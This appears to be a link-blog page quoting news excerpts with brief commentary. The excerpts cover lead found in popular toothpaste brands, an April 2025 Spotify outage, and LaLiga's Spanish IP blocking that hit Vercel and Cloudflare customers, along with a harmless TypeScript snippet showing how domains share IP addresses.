Rubin first learned that lead-contaminated ingredients were added to toothpaste about 12 years ago while working with families that had children with high levels of the metal in their blood. The common denominator among them was a brand of toothpaste, Earthpaste, that contained lead.

Last year she detected high levels in some toothpaste using an XRF lead detection tool. The levels were high enough to raise concern, and she crowdfunded with readers to send popular brands to an independent laboratory for testing.

Among those found to contain the toxins were Crest, Sensodyne, Tom’s of Maine, Dr Bronner’s, Davids, Dr Jen and others.

So far, none of the companies Lead Safe Mama checked have said they will work to get lead out of their product, Rubin said. Several sent her cease-and-desist letters, which she said she ignored, but also posted on her blog.

[…]

Source: Toothpaste widely contaminated with lead and other metals, US research finds | US news | The Guardian

Spotify was down for a while. Yay clouds.

April 16

The music-streaming app Spotify was down for a good chunk of time this morning, leaving millions of music fans in the lurch. Both the app and web client weren’t working, but service seems to have broadly returned to normal at this point, though lingering bugs may remain.

At about 10:40AM ET, Spotify updated its X account saying it was working on the issue and also said that “the reports of this being a security hack are false.” We haven’t seen any such reports yet, but we’ll keep an eye on things to see if they offer any more details on this front. Finally, at 12:08PM ET, the company said things were back to normal. All told, it seems like things were down for nearly four hours, a pretty long outage.

Update, April 16, 2025, 11:04AM ET: Added details about Spotify claiming this downtime was not due to a security hack.

Update, April 16 2025, 12:18PM ET: This story and its headline have been updated to note that Spotify is now back online after its outage.

Source: Spotify was down for a while this morning, but it’s back now

This is one reason why I like my mp3s.

LaLiga Piracy Blocks Randomly Take Down Huge Innocent Segments of the Internet With No Recourse or Warning, Slammed as “Unaccountable Internet Censorship”

Cloud-based web application platform Vercel is among the latest companies to find their servers blocked in Spain due to LaLiga’s ongoing IPTV anti-piracy campaign. In a statement, Vercel’s CEO and the company’s principal engineer slam “indiscriminate” blocking as an “unaccountable form of internet censorship” that has prevented legitimate customers from conducting their daily business.

Since early February, Spain has faced unprecedented yet avoidable nationwide disruption to previously functioning, entirely legitimate online services.

A court order obtained by top-tier football league LaLiga, in partnership with telecommunications giant Telefonica, authorized ISP-level blocking across all major ISPs to prevent public access to pirate IPTV services and websites.

In the first instance, controversy centered on Cloudflare, where shared IP addresses were blocked by local ISPs when pirates were detected using them, regardless of the legitimate Cloudflare customers using them too.

When legal action by Cloudflare failed, in part due to a judge’s insistence that no evidence of damage to third parties had been proven before the court, joint applicants LaLiga and Telefonica continued with their blocking campaign. It began affecting innocent third parties in early February and hasn’t stopped since.
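
The mechanics of the collateral damage are worth spelling out: platforms like Cloudflare and Vercel put many unrelated domains behind shared IP addresses, so an ISP-level block on a single address silences every site behind it. A small Node.js/TypeScript sketch of the problem, using placeholder domains:

```ts
// Sketch: many unrelated domains can resolve to the same shared IP.
// Blocking that IP at the ISP level takes all of them offline.
// (With real domains; the .example placeholders here will not resolve.)
import { promises as dns } from "node:dns";

async function main(): Promise<void> {
  // Placeholder names: imagine one pirate domain among legitimate ones.
  const domains = ["legit-shop.example", "news-site.example", "pirate-iptv.example"];
  const byIp = new Map<string, string[]>();

  for (const domain of domains) {
    for (const ip of await dns.resolve4(domain)) {
      byIp.set(ip, [...(byIp.get(ip) ?? []), domain]);
    }
  }

  // Any address serving more than one name illustrates the collateral risk:
  // an ISP-level block on that address silences every domain behind it.
  for (const [ip, names] of byIp) {
    if (names.length > 1) {
      console.log(`${ip} is shared by: ${names.join(", ")}`);
    }
  }
}

main();
```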

Vercel Latest Target

US-based Vercel describes itself as a “complete platform for the web.” Through the provision of cloud infrastructure and developer tools, users can deploy code from their computers and have it up and running in just seconds. Vercel is not a ‘rogue’ hosting provider that ignores copyright complaints, it takes its responsibilities very seriously.

Yet it became evident last week that blocking instructions executed by Telefonica-owned telecoms company Movistar were once again blocking innocent users, this time customers of Vercel.

 

Movistar informed of yet more adverse blocking

As the thread on X continued, Vercel CEO Guillermo Rauch was asked whether Vercel had “received any requests to remove illegal content before the blocking occurs?”

Vercel Principal Engineer Matheus Fernandes answered quickly.

 

No takedown requests, just blocks

Additional users were soon airing their grievances: ChatGPT blocked regularly on Sundays; a whole day “ruined” due to unwarranted blocking of AI code editor Cursor; blocking at Cloudflare, GitHub, BunnyCDN; the list goes on.

 


Vercel Slams “Unaccountable Internet Censorship”

In a joint statement last week, Vercel CEO Guillermo Rauch and Principal Engineer Matheus Fernandes cited the LaLiga/Telefonica court order and reported that ISPs are “blocking entire IP ranges, not specific domains or content.”

Among them, the IP addresses 66.33.60.129 and 76.76.21.142, “used by businesses like Spanish startup Tinybird, Hello Magazine, and others operating on Vercel, despite no affiliations with piracy in any form.”

[…]

The details concerning this latest blocking disaster and the many others since February, are unavailable to the public. This lack of transparency is consistent with most if not all dynamic blocking programs around the world. With close to zero transparency, there is no accountability when blocking takes a turn for the worse, and no obvious process through which innocent parties can be fairly heard.

[…]

The hayahora.futbol project is especially impressive; it gathers evidence of blocking events, including dates, which ISPs implemented blocking, how long the blocks remained in place, and which legitimate services were wrongfully blocked.

[…]

Source: Vercel Slams LaLiga Piracy Blocks as “Unaccountable Internet Censorship” * TorrentFreak

So guys streaming a *game* can shut down huge sections of the internet without accountability? How did a law like that happen without some serious corruption?